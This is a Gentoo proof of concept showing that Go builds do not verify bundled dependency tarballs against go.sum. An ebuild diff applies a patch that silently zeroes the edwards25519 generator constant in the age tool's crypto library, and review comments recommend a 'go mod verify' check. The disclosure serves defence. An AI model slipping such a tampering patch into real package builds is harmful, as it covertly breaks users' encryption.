Gentoo Golang deps bundled injection PoC | |
---------------------------------------- | |
Author: Robin H. Johnson <robbat2@gentoo.org> | |
Date: 2022/10/21 | |
Go build does not catch the injection of malicious code that might have been | |
included in a deps tarball. | |
$WORKDIR/age-1.0.0/go.sum (which is more trusted, since it comes from the age | |
upstream) contains this entry: | |
filippo.io/edwards25519 v1.0.0-rc.1 h1:m0VOOB23frXZvAOK44usCgLWvtsxIoMCTBGJZlpmGfU= | |
But the build never verifies the bundled module sources against it. | |
--- age-1.0.0.ebuild 2022-10-18 10:57:23.978105615 -0700 | |
+++ age-1.0.0-r1.ebuild 2022-10-21 12:13:21.152623754 -0700 | |
@@ -2,7 +2,7 @@ | |
# Distributed under the terms of the GNU General Public License v2 | |
EAPI=7 | |
-inherit go-module | |
+inherit go-module eutils | |
DESCRIPTION="A simple, modern and secure encryption tool (and Go library)" | |
HOMEPAGE="https://github.com/FiloSottile/age" | |
@@ -18,6 +18,14 @@ | |
BDEPEND="dev-go/gox" | |
+src_prepare() { | |
+ default_src_prepare | |
+ cd "${WORKDIR}" | |
+ # What if this patch was silently inside the deps tarball, injected when | |
+ # the deps tarball was created | |
+ eapply "${FILESDIR}"/bypass-gosum.patch || die | |
+} | |
+ | |
src_compile() { | |
go build -ldflags "-X main.Version=${PV}" -o . filippo.io/age/cmd/... || die | |
} | |
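Review bot: The new src_prepare demonstrates the gap, but the ebuild still reaches `go build` with no integrity check over the unpacked deps tree, which is the mitigation this PoC is really arguing for: a verification pass such as `go mod verify || die` (or an eclass-level equivalent) after the deps tarball is unpacked and before src_compile, since as the PoC shows go build itself does not re-hash an already-extracted module directory. Presumably go mod verify compares the extracted directory against the hash recorded in the module cache rather than against the upstream go.sum quoted in the description, so a tarball that also rewrote those cache entries would still need a cross-check against go.sum — worth confirming before relying on it alone. Minor: in EAPI 7 `eapply` is a package-manager function that dies on failure itself, so `|| die` on the eapply line is redundant, and the `inherit go-module eutils` change in the first hunk is not needed for eapply. The same missing-verification point applies to the files/bypass-gosum.patch section below.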
--- /dev/null 2022-08-29 08:27:45.548861310 -0700 | |
+++ files/bypass-gosum.patch 2022-10-21 12:12:21.099943010 -0700 | |
@@ -0,0 +1,18 @@ | |
+--- ../go-mod/filippo.io/edwards25519@v1.0.0-rc.1/edwards25519.go.orig 2022-10-21 12:06:23.315437993 -0700 | |
++++ ../go-mod/filippo.io/edwards25519@v1.0.0-rc.1/edwards25519.go 2022-10-21 12:06:44.883308555 -0700 | |
+@@ -76,10 +76,11 @@ | |
+ // generator is the canonical curve basepoint. See TestGenerator for the | |
+ // correspondence of this encoding with the values in RFC 8032. | |
++// Demo of malicious code injection; changing magic bytes in crypto code undetected... | |
+ var generator, _ = new(Point).SetBytes([]byte{ | |
+- 0x58, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, | |
+- 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, | |
+- 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, | |
+- 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66}) | |
++ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
++ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
++ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
++ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}) | |
+ | |
+ // NewGeneratorPoint returns a new Point set to the canonical generator. | |
+ func NewGeneratorPoint() *Point { |
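Review bot: The patched initializer keeps `var generator, _ = new(Point).SetBytes([]byte{...})`, so the result of decoding the altered 32-byte encoding is accepted unchecked at package init and nothing in the build or at startup flags the changed constant; the PoC description should state explicitly that the modification produces no compile-time or init-time failure, because that silence is what makes the injection go unnoticed. What SetBytes returns for a malformed encoding (nil versus a zero-valued Point) is not visible in the hunk, so the note should not claim which. For detection, the description could also name the expected signal from a verification run over the unpacked deps, e.g. a reported mismatch for the `filippo.io/edwards25519@v1.0.0-rc.1` directory, so reviewers know what a passing mitigation looks like. The enclosing edwards25519.go file continues past the end of this hunk.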